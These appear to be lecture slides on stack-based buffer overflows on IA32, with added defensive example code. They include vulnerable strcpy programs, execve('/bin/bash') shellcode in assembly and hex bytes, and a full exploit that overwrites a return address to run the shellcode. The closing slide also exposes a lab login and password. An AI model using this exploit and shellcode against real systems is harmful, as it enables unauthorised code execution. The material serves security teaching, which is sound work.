Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium


Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks, March 22

Overview
- Introduction
- Buffer overflows
- Stack-based buffer overflows
- Shellcode
- Code injection
- Conclusion

Introduction
- Buffer overflows: write outside the boundaries of an array
- Can be used to overwrite adjacent memory
- The stack contains control-flow related data, e.g. return addresses
- Overwriting this data allows an attacker to execute new or existing code

Buffer overflows (on IA32)

    #include <string.h>

    int main(int argc, char **argv) {
        int a;
        char buf[100];
        strcpy(buf, argv[1]);   /* copies until the NUL of argv[1], however long that string is */
    }

- int a is allocated on the stack: 4 bytes
- buf has memory allocated for 100 chars: 100 bytes
- The string in argv[1] could be longer than that, allowing an attacker to overwrite a in this example

Buffer overflow on IA32 (figure: stack layout with high addresses at the top and low addresses at the bottom; int a sits above char buf[100], so an overflow of buf runs upward into a)

Stack based buffer overflows

    #include <string.h>

    void f1(char *a) {
        char buffer[100];
        strcpy(buffer, a);   /* no bound check: a string longer than 99 bytes overflows buffer */
    }

    void f0(char *b) {
        f1(b);
    }

Stack-based buffer overflows (figure: the stack frames of f0 and f1, high addresses at the top). The frame of f0 holds the return address of f0, the saved frame pointer of f0, the local variables of f0 and the arguments of f1; f0 executes "call f1". The frame of f1 holds the return address of f1, the saved frame pointer of f1 and buffer[]. When f1 overflows buffer[], the injected code is written into the buffer and the overflow continues over the saved frame pointer and the return address of f1, which now points to the injected code.

Shellcode
- Code to execute once the return address has been overwritten
- Usually inserted into the buffer that is used to overflow
- Some subtleties: a NUL byte (0x00) terminates a strcpy, a newline (\n) terminates gets

Example code

    #include <unistd.h>

    int main() {
        char *argv[2];
        argv[0] = "/bin/bash";
        argv[1] = 0;
        execve(argv[0], argv, 0);
    }

Example transformed to assembly

        .globl main
        .type main, @function
    main:
        push $0x68          # Place h on the stack (the upper three bytes are the terminating NUL)
        push $0x7361622f    # Place sab/ on the stack (bytes 2f 62 61 73 = "/bas")
        push $0x6e69622f    # Place nib/ on the stack (bytes 2f 62 69 6e = "/bin")
        mov  %esp,%ebx      # Copy the pointer to /bin/bash to ebx
        xor  %edx,%edx      # Empty edx
        push %edx           # Place a NULL on the stack to terminate the argv
        push %ebx           # Place the pointer to /bin/bash on the stack
        mov  %esp,%ecx      # Copy the pointer to the pointer to /bin/bash into ecx
        mov  $0xb,%eax      # Let the syscall know we want execve
        int  $0x80          # Do the system call

Shellcode

    (gdb) x/27b main
    0x :  0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68
    0x :  0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2
    0x :  0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00
    0x :  0x00 0xcd 0x80

Note the three 0x00 bytes in the encoding of mov $0xb,%eax (b8 0b 00 00 00): a strcpy of this code would stop there.

Shellcode

        .globl main
        .type main, @function
    main:
        push $0x68
        push $0x7361622f
        push $0x6e69622f
        mov  %esp,%ebx
        xor  %edx,%edx
        push %edx
        push %ebx
        mov  %esp,%ecx
        xor  %eax,%eax      # set %eax to 0
        mov  $0xb,%al       # copy 0xb into %al (least significant byte of %eax)
        int  $0x80
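As an added example (not from the slides), the two encodings above as byte arrays, with a check of how many bytes a copy that stops at a terminator byte (0x00 for strcpy, '\n' for gets) would carry over intact; the function names are my own.

```c
#include <stddef.h>
#include <string.h>

/* Added example, not from the slides: the two shellcode encodings shown on the
 * page as byte arrays, plus a check of how many bytes a copy that stops at a
 * terminator byte (0x00 for strcpy, '\n' for gets) would carry over intact. */

/* First listing (gdb x/27b): mov $0xb,%eax encodes as b8 0b 00 00 00. */
const unsigned char shellcode_v1[] = {
    0x6a, 0x68, 0x68, 0x2f, 0x62, 0x61, 0x73, 0x68,
    0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x31, 0xd2,
    0x52, 0x53, 0x89, 0xe1, 0xb8, 0x0b, 0x00, 0x00,
    0x00, 0xcd, 0x80
};
const size_t shellcode_v1_len = sizeof shellcode_v1;   /* 27 bytes */

/* Second listing: xor %eax,%eax; mov $0xb,%al encodes as 31 c0 b0 0b. */
const unsigned char shellcode_v2[] = {
    0x6a, 0x68, 0x68, 0x2f, 0x62, 0x61, 0x73, 0x68,
    0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x31, 0xd2,
    0x52, 0x53, 0x89, 0xe1, 0x31, 0xc0, 0xb0, 0x0b,
    0xcd, 0x80
};
const size_t shellcode_v2_len = sizeof shellcode_v2;   /* 26 bytes */

/* Number of bytes of buf[0..len) that precede the first occurrence of term,
 * i.e. how many bytes strcpy (term 0x00) or gets (term '\n') would copy
 * before stopping; len when term does not occur at all. */
size_t bytes_before_terminator(const unsigned char *buf, size_t len, unsigned char term) {
    const unsigned char *hit = memchr(buf, term, len);
    return hit ? (size_t)(hit - buf) : len;
}

/* 1 if the whole sequence survives a copy that stops at term, 0 if it is truncated. */
int survives_copy(const unsigned char *buf, size_t len, unsigned char term) {
    return bytes_before_terminator(buf, len, term) == len;
}
```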

Sample vulnerable program

    #include <string.h>

    void function(int a, char *b) {
        char string1[10];
        char string2[50];
        strcpy(string2, b);   /* unbounded copy into a 50-byte buffer */
    }

    int main(int argc, char **argv) {
        function(1, argv[1]);
    }

Sample exploit

    #include <string.h>
    #include <unistd.h>

    char shellcode[] =
        "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89"
        "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80";

    #define ADDR 0xbffffe2c

    int main() {
        char overflow[72];
        char *argv[3] = { "./bufferoverflow", overflow, NULL };
        memset(overflow, '\x90', 72);                    // fill with NOPs
        *(long *) &overflow[68] = ADDR;                  // replace ret. addr.
        memcpy(overflow, shellcode, strlen(shellcode));
        execve(argv[0], argv, 0);                        // exec program
    }
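As an added example (not the slides' code), the vulnerable function() beside a bounded variant that refuses any input that does not fit in string2; copy_bounded(), function_hardened() and max_accepted_len() are names I chose for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides: the slide's function() next to a
 * hardened variant. copy_bounded() and function_hardened() are my own names. */

#define STRING2_SIZE 50

/* As on the slide: strcpy() copies until the NUL in b, with no regard for
 * sizeof string2. Kept only for comparison with the bounded version. */
void function_vulnerable(int a, const char *b) {
    char string1[10];
    char string2[STRING2_SIZE];
    (void)a; (void)string1;
    strcpy(string2, b);
}

/* Copy src into dst[dstsz]. Returns 0 when src and its NUL fit, -1 otherwise;
 * never writes past dst + dstsz and leaves dst as "" when it refuses. */
int copy_bounded(char *dst, size_t dstsz, const char *src) {
    if (dstsz == 0) return -1;
    const char *nul = memchr(src, '\0', dstsz);   /* look for the NUL within dstsz bytes */
    if (nul == NULL) {                            /* src is at least dstsz bytes: no room for the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);    /* copy the bytes and the terminator */
    return 0;
}

/* Hardened function(): string2 only receives input that fits in it. */
int function_hardened(int a, const char *b) {
    char string1[10];
    char string2[STRING2_SIZE];
    (void)a; (void)string1;
    return copy_bounded(string2, sizeof string2, b);
}

/* Longest input function_hardened() accepts: STRING2_SIZE - 1 bytes. */
size_t max_accepted_len(void) { return STRING2_SIZE - 1; }

/* Stand-alone use mirrors the slide's main(): one argument taken from argv. */
int main(int argc, char **argv) {
    if (argc < 2) { fputs("usage: prog <string>\n", stderr); return 1; }
    if (function_hardened(1, argv[1]) != 0) {
        fprintf(stderr, "input too long: at most %zu bytes accepted\n", max_accepted_len());
        return 1;
    }
    puts("ok");
    return 0;
}
```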

Conclusion
- Follow “Gera’s Insecure Programming by example”: ming/
- Login/pass for the computers: cstudy/distrinet